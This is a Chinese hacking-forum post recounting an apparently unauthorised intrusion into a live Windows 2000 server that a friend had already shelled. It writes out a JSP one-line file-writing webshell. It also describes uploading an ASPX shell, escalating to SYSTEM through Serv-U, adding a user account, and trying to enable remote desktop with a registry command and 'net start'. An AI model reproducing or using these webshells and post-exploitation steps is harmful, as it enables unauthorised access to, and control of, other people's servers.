黑帽联盟

 找回密码
 会员注册
查看: 1909|回复: 0
打印 上一主题 下一主题

[系统安全] 记一次windows2000提权(主要是思路)

[复制链接]

895

主题

38

听众

3323

积分

管理员

Rank: 9Rank: 9Rank: 9

  • TA的每日心情
    无聊
    4 天前
  • 签到天数: 1644 天

    [LV.Master]伴坛终老

    这是别人提权的一个过程,感兴趣的看看,了解一下其思路


    一个朋友发来的shell,密码什么的我就不说了,看看思路吧,现在开始看,不一定能成功。
    脚本探测了一下,发现支持jsp,如图:
    10.png

    于是直接传个jsp的shell上去,但是貌似悲剧了:
    11.png

    看一下test.jsp的代码,看到只有一个笑脸符号,把代码换成jsp的一句话:
    <%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>999999999999

    保存再访问,如图:
    12.png
    蛋疼啊,成功解析了,但是为什么我的大马不解析呢?
    又传了几个jsp的shell上去,发现都不解析,直接给下载了,说明服务器实际上不支持jsp。
    那就另寻思路了。
    我还是喜欢在aspx的shell里做事,于是传个上去,可以解析。

    执行CMD的时候出了点问题,如图:
    13.png

    找不到路径,说明默认的cmd.exe的路径不对,难道是这服务器的系统盘不是C盘?或者不是2003的服务器?
    看了下C盘,发现了WINNT,如图:
    14.png

    果然是2000的服务器,这样的话,把shell中默认的cmd.exe的路径改成:
    c:\winnt\system32\cmd.exe
    这样就可以了,如图:
    15.png


    netstat -an看了下端口,发现21和43958都是开启的,如图:
    16.png

    试试能不能直接提吧,看这服务器的安全设置,目录都可以浏览,cmd也可以执行,如果不出意外,su应该可以提。
    不出所料,果然可以直接提,如图:
    17.png
    18.png


    直接加用户了,如图:
    19.png


    看了下IP,是内网,如图:
    21.png


    其实是内网也不一定需要转发的,因为有的内网服务器是处在DMZ区的,所以有的是可以直接连的,前边看3389没有开,21是开放的,ftp连一下,看能不能连上,如果能连上,那就不需要转发了,如图:
    22.png

    连上了,跟刚才提权的时候返回的版本也一样,可以确定是同一台服务器,说明这台主机是不需要转发就可以直接连的。
    把netstat -an里所有可疑的端口都尝试了一遍,都连不上,难道是远程桌面没开?

    这台服务器是处在内网中的DMZ区的,所以本地直接管理的可能性是非常大的,并且IP还是10开头的,说明内网挺大,还有就是shell里边的文件很乱,这些情况在托管的服务器中是看不到的,所以这台服务器很有可能是没有开启远程桌面服务。

    net start看了一下已经开启的服务,发现远程桌面Terminal Server确实没有开,那就帮他开了吧。
    开启3389的命令是:
    REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /vfDenyTSConnections /t REG_DWORD /d 0 /f
    直接用SU执行就可以了。

    执行成功,再来看一下端口,蛋疼,3389还是没开,又在aspshell里读了一下远程桌面的端口,确实是3389,当时我上边执行的开启3389的命令是用于2003的服务器的,这是个2000,所以不成功,蛋疼。
    再执行:
    net startTerminal Services
    蛋疼,还是不行。

    2000的服务器现在还真少见,我再研究研究怎么开他3389吧。简单查了下资料,说是当2000执行queryuser没反应的时候说明终端组件不存在,是没办法开3389的,这个问题有待以后考证,反正现在执行queryuser是没反应的,连也是连不上了,传了个3389bat上去,运行后还是没开,不过反正是有system,直接上马就行,但我是内网,这步骤就省略了吧。
    本来想给服务器重启一下试试的,无奈这个2000好像不带shutdown.exe,自己传了个上去,执行了,但是好像没反应,蛋疼。

    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部